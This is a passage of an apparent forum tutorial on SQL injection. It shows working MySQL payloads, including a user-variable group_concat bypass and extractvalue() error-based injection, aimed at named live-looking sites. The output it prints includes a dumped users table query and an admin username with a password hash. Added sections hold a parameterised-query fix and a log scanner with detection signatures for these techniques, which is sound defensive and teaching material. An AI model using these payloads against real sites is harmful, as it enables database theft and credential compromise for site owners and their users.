our own variable to bypass the 1024 character limit of group_concat. If you're new to SQL, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests. First off, the database/table/columns.
Code:
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
PoC:
Code:
http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+
Of course, if magic_quotes is enabled you would need to avoid quotation marks altogether, by using hex values or the char() function. View the source, and we see every single database/table/column accessible:
Now, to grab information from the columns.
Code:
(select (@) from (select (@:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
PoC:
Code:
http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+
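Both payloads above only work because the id value is pasted into a quoted SQL literal, and the magic_quotes remark shows why escaping quotes is not a fix (hex literals and char() need no quotes). The following is an added example, not code from the original post or from the sites it names: the same lookup built two ways against an in-memory SQLite table, to show that parameter binding, not quoting, is what stops the injection. The table, rows and the probe value are constructed for this example.

```python
"""Vulnerable string-built lookup beside the parameterised one (added example;
table, rows and probe value are constructed, not from the original post)."""
import sqlite3


def make_db():
    """Build a small constructed table shaped like a work.php?id= lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE work (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO work VALUES (?, ?)",
        [(1, "Landscape"), (2, "Portrait"), (3, "Still life")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """String-built query: a quote in the value closes the literal and the
    rest of the value is executed as SQL (the id=-181' shape from the post)."""
    sql = "SELECT id, title FROM work WHERE id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Bound parameter: the driver passes the value separately from the SQL
    text, so quotes, hex literals and char() inside it are only characters.
    Validating that user_id is an integer would be a second, independent layer."""
    return conn.execute(
        "SELECT id, title FROM work WHERE id = ?", (user_id,)
    ).fetchall()


# Constructed probe in the shape of the post's UNION payload, with harmless
# columns: the leading -1 empties the real result set, UNION appends ours.
PROBE = "-1' UNION SELECT 1, 'injected'--"


def demo():
    """Run both lookups with a normal id and with the probe; return the rows."""
    conn = make_db()
    return {
        "normal_vulnerable": lookup_vulnerable(conn, "2"),
        "normal_safe": lookup_safe(conn, "2"),
        "probe_vulnerable": lookup_vulnerable(conn, PROBE),  # attacker-chosen row
        "probe_safe": lookup_safe(conn, PROBE),              # no rows at all
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

With a normal id both functions return the same row; with the probe, the string-built version returns the attacker-supplied `(1, 'injected')` row while the bound version simply finds no id equal to that text. The comment terminator at the end of the probe is what swallows the application's own closing quote, which is why the `--+` suffix appears in every payload on this page.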
xPath Injection
If you're trying to hack a site, and you try looking for tons of methods, and you finally find an SQLi vuln yet ORDER BY, 1=1 etc. don't work, then chances are you could use xPath injection. This is for MySQL v5.1 only.
First of all, we need a vulnerable site.
Code:
http://www.ianforsythphotographer.com/main.php?id=1'
This is vulnerable to union based injection, yes, but for the purposes of this tutorial I will use xPath injection.
First of all, to gather data we will be using extractvalue(rand(),concat(0x0a,data)). So,
Code:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,version()))--+
"Query failed: XPATH syntax error: ' 5.1.39-log'"
Now to get the table names, we will use
Code:
and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+
Use limit to increment through the tables. So,
Code:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=0x69665f696d61676573 limit 3,1)))--+
"Query failed: XPATH syntax error: '::plogger_config'"
Now to get the columns of that table, we will use basically the same query, except replace tables with columns. And again use limit to increment through the columns.
Code:
and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="TABLE NAME" limit 0,1)))
So,
Code:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 3,1)))--+
"Query failed: XPATH syntax error: '::admin_username'"
and..
Code:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 4,1)))--+
"Query failed: XPATH syntax error: '::admin_password'"
Now that we have the columns, we will need to get the data from them. We will use:
Code:
extractvalue(rand(),concat(0x0a,(select concat(COLUMNS) from TABLE)))
So,
Code:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(admin_username,0x3a,admin_password) from if_images.plogger_config LIMIT 0,1)))--+
"Query failed: XPATH syntax error: 'admin:392592ed88f501ea498f14343'"
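Every request in this walkthrough, the user-variable group_concat bypass at the top of the page and the extractvalue() probes in this section alike, leaves a distinctive footprint in two places: the decoded query string in the web server's access log, and the "XPATH syntax error" message that MySQL returns only when extractvalue()/updatexml() are fed non-XPath input (the same message the page above reads its results out of). The following is an added example, not code from the original post: a small scanner that decodes access-log requests, tags them with the technique they indicate, and separately pulls the leaked values out of application error logs. Log lines, IPs and paths are constructed for this example; the hosts named on this page are not used.

```python
"""Detect error-based (XPATH) and user-variable SQL injection probes in logs.
Added example; all log lines below are constructed, not real traffic."""
import re
from urllib.parse import unquote_plus, urlsplit

# Each pattern is named for the technique it indicates. They are matched
# against the fully URL-decoded, lower-cased, whitespace-collapsed query.
SIGNATURES = {
    "error_based_xpath": re.compile(r"\b(extractvalue|updatexml)\s*\("),
    "schema_enumeration": re.compile(r"\binformation_schema\s*\."),
    "union_based": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "user_variable_accumulator": re.compile(r"@[a-z0-9_]*\s*:=\s*concat\s*\("),
    "comment_terminator": re.compile(r"--\s*$|#\s*$"),  # the trailing --+ / #
}

# Request field of a combined-format access log: "METHOD TARGET HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# MySQL's error text when extractvalue()/updatexml() get a non-XPath string;
# the quoted part is whatever the attacker concatenated, i.e. the leaked value.
XPATH_ERROR_RE = re.compile(r"XPATH syntax error: '(?P<leak>[^']*)'")


def normalise_query(target):
    """Return the decoded query string in a canonical form for matching."""
    query = urlsplit(target).query
    decoded = unquote_plus(query)      # %27 -> ', + -> space
    decoded = unquote_plus(decoded)    # second pass catches double encoding
    return re.sub(r"\s+", " ", decoded).strip().lower()


def classify_request(target):
    """List the signature names that fire for one request target."""
    q = normalise_query(target)
    return [name for name, rx in SIGNATURES.items() if rx.search(q)]


def scan_access_log(lines):
    """Return (line_number, client_ip, signatures) for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        tags = classify_request(m.group("target"))
        if tags:
            hits.append((n, line.split(" ", 1)[0], tags))
    return hits


def scan_app_log(lines):
    """Return the values MySQL leaked through XPATH syntax errors. Any hit
    means two things: the app echoes DB errors, and someone is driving
    extractvalue()/updatexml() with crafted input."""
    leaks = []
    for line in lines:
        m = XPATH_ERROR_RE.search(line)
        if m:
            leaks.append(m.group("leak"))
    return leaks


# Constructed access-log lines: one benign request, one user-variable
# group_concat bypass, one extractvalue() probe, one benign request.
ACCESS_LOG = [
    '203.0.113.7 - - [12/Mar/2024:09:14:03 +0000] "GET /work.php?id=181 HTTP/1.1" 200 4311',
    '203.0.113.7 - - [12/Mar/2024:09:14:09 +0000] "GET /work.php?id=-181%27%20UNION%20SELECT%201,2,3,4,5,'
    '(select(@)%20from%20(select(@:=0x00),(select(@)%20from%20(information_schema.columns)'
    '%20where%20(table_schema%3E=@)%20and%20(@)in(@:=concat(@,0x0a,table_name))))a)--+ HTTP/1.1" 200 9120',
    '198.51.100.23 - - [12/Mar/2024:09:15:41 +0000] "GET /main.php?id=1%27%20and%20extractvalue(rand(),'
    'concat(0x0a,version()))--+ HTTP/1.1" 500 612',
    '198.51.100.23 - - [12/Mar/2024:09:15:50 +0000] "GET /main.php?id=1 HTTP/1.1" 200 2210',
]

# Constructed application-log lines in the shape of the errors quoted above.
APP_LOG = [
    "[12/Mar/2024 09:15:41] Query failed: XPATH syntax error: ' 5.1.39-log'",
    "[12/Mar/2024 09:16:02] Query failed: XPATH syntax error: '::plogger_config'",
    "[12/Mar/2024 09:16:30] Query OK: 1 row",
]

if __name__ == "__main__":
    for n, ip, tags in scan_access_log(ACCESS_LOG):
        print("line %d from %s: %s" % (n, ip, ", ".join(tags)))
    print("values leaked via XPATH errors:", scan_app_log(APP_LOG))
```

The two scans complement each other: the access-log signatures fire on the first probe whether or not it succeeds, while the XPATH error scan only fires when the application is actually handing MySQL's error text to the client, which is the condition this whole technique depends on and the first thing to turn off (suppress database errors in responses and log them server-side instead). The second `unquote_plus` pass is deliberate, since a probe sent double-encoded would otherwise decode to `%27` and miss every pattern.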